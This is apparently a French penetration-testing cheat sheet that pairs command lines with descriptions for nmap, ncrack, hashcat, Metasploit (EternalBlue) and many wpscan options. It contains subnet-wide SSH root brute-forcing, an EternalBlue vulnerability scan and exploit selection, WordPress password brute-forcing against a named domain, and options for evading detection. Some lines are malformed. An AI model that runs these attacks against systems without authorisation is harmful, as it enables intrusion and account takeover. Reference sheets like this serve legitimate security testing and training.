nmap -n -sn -PR 10.5.23.0/24Scan hote ARPnmapScanner de reseaux
ls /usr/share/nmap/scriptsListe des scripts NmapnmapScripts NSE
nmap -n -Pn -p 443 --script smbvuln- ms17-010 10.5.23.0/24Rechercher les hôtes vulnérables EternalBluenmapScripts NSE
shodan.io, censys.ioBases de données publiques de scan InternetshodanScanner de reseaux
ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24Essayez les mots de passe SSH à partir d'une liste de motsncrackDéchiffrement de mots de passe
searchsploit apacheRecherche des exploits pour "apache" (copie locale de l'Exploit-DB)searchsploitRecherche des exploits
john hashes.txtDéchiffrement d'un hash en utilisant John the RipperJohn the RipperDéchiffrement de hash
hashid 869d[...]bd88Identifier le type de hachagehashidDéchiffrement de hash
hashcat --example-hashesAfficher des exemples de types de hachage pour hashcathashcat Déchiffrement de hash
hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*Déchiffrement hashes par code-type (par exemple code 5600 pour le type NetNTLMv2)hashcat Déchiffrement de hash
msfconsoleDémarrez Metasploitmétasploit - msfconsoleExploitation vulnérabilités
> search eternalblueRecherche exploitmétasploit - msfconsoleExploitation vulnérabilités
msf > use exploit/windows/smb/ms17_…Utilisez exploitmétasploit - msfconsoleExploitation vulnérabilités
curl ifconfig.meAfficher son ip publiquecurlLinux OS
ngrep 'secret' port 389
Rechercher le mot "secret" sur le trafic réseau, sur le port 389 (ldap) plus exactementngrepAnalyse de paquets
systemctl [start|restart|stop|status|enable|disable] ssh
Méthode "Systemd" - Démarrer/arrêter/statuts SSHsshServeur/Client SSH
service ssh [start|restart|stop|status]
Méthode "service command" - Démarrer/arrêter/statuts SSHsshServeur/Client SSH
/etc/init.d/ssh [start|restart|stop|status]
Méthode "System V. Init scripts" - Démarrer/arrêter/statuts SSHsshServeur/Client SSH
wpscan --url https://oksecu.com --passwords test-mdp.txt --url test-users.txt wpscanscanner de vulnérabilités WordPress
wpscan --url https://oksecu.com -P soleil123 t -U adminwpscanscanner de vulnérabilités WordPress
whatweb monsite.comhttps://github.com/urbanadventurer/WhatWebwhatwebscan la structure d'un site web
netstat -lnp | grep LISTENLister vos connexions entrantes/sortantesnetstat + greplister les connexions en ECOUTE
theharvester -d example.com -l 500 -b all -e admin@example.comCollecte informationstheharvesterRechercher des comptes de réseaux sociaux associés à une adresse e-mail
wpscan --url http://example.com Scanne le site WordPress spécifié par l'URL pour détecter des vulnérabilités générales.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --enumerate u Énumère les utilisateurs du site WordPress. Utile pour identifier les noms d'utilisateur, souvent utilisé pour des attaques de force brute.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --enumerate pÉnumère les plugins installés sur le site. Cette commande permet d'identifier les plugins potentiellement vulnérables.wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --enumerate t Énumère les thèmes installés sur le site WordPress pour rechercher d'éventuelles vulnérabilités.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --enumerate vpÉnumère les plugins vulnérables uniquement, en s'appuyant sur la base de données de vulnérabilités de WPScan.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --api-token YOUR_TOKENUtilise un jeton API WPScan pour accéder à la base de données en ligne des vulnérabilités WordPress. Requis pour certaines fonctions avancées.wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --forceForce le scan même si le site est protégé ou si certains problèmes de certificat SSL sont détectés.wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --passwords /path/to/passwords.txt Effectue une attaque par force brute en testant plusieurs mots de passe sur les comptes utilisateurs énumérés précédemment.wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --stealthy Effectue un scan furtif en minimisant les requêtes, évitant ainsi de déclencher des protections anti-scan sur le site cible.wpscanscanner de vulnérabilités WordPress
wpscan --update Met à jour WPScan et sa base de données de vulnérabilités pour garantir l'utilisation des informations les plus récentes lors des scans.wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --enumerate apÉnumère uniquement les plugins avec des versions vulnérables.
wpscanscanner de vulnérabilités WordPress
wpscan --help Affiche l'aide complète de WPScan avec toutes les options disponibles et leurs descriptions.
wpscanscanner de vulnérabilités WordPress
wpscan --random-user-agentUtilise un User-Agent aléatoire pour chaque requête HTTP afin de tromper les protections qui se basent sur l'empreinte du User-Agent.
wpscanscanner de vulnérabilités WordPress
wpscan --throttle 5Définit un délai de 5 secondes entre chaque requête pour éviter d'être détecté ou bloqué par des systèmes de défense anti-brute-force.
wpscanscanner de vulnérabilités WordPress
wpscan --proxy http://proxy.example.com:8080Utilise un serveur proxy pour masquer l'adresse IP de l'utilisateur lors de l'exécution du scan.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --ignore-main-redirect Ignore les redirections principales du site, souvent utilisées pour des raisons de sécurité ou des configurations spécifiques.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --no-banner Supprime l'affichage de la bannière WPScan lors de l'exécution, utile pour des scripts automatisés ou des rapports propres.
wpscanscanner de vulnérabilités WordPress
wpscan --output /path/to/output.txt Enregistre les résultats du scan dans un fichier texte pour consultation ultérieure ou pour générer des rapports.
wpscanscanner de vulnérabilités WordPress
wpscan --format json --output report.json Génère un rapport de scan au format JSON, pratique pour l'intégration avec d'autres outils ou l'analyse des résultats dans des systèmes automatisés.wpscanscanner de vulnérabilités WordPress
wpscan --disable-tls-checksDésactive les vérifications des certificats TLS, utile si le site a un certificat auto-signé ou expiré.
wpscanscanner de vulnérabilités WordPress
wpscan --url http://example.com --enumerate vt Énumère les thèmes vulnérables uniquement, en s'appuyant sur la base de données WPScan.wpscanscanner de vulnérabilités WordPress
wpscan --proxy-auth user:passwordAjoute une authentification proxy si le proxy utilisé pour le scan nécessite un identifiant et un mot de passe.wpscanscanner de vulnérabilités WordPress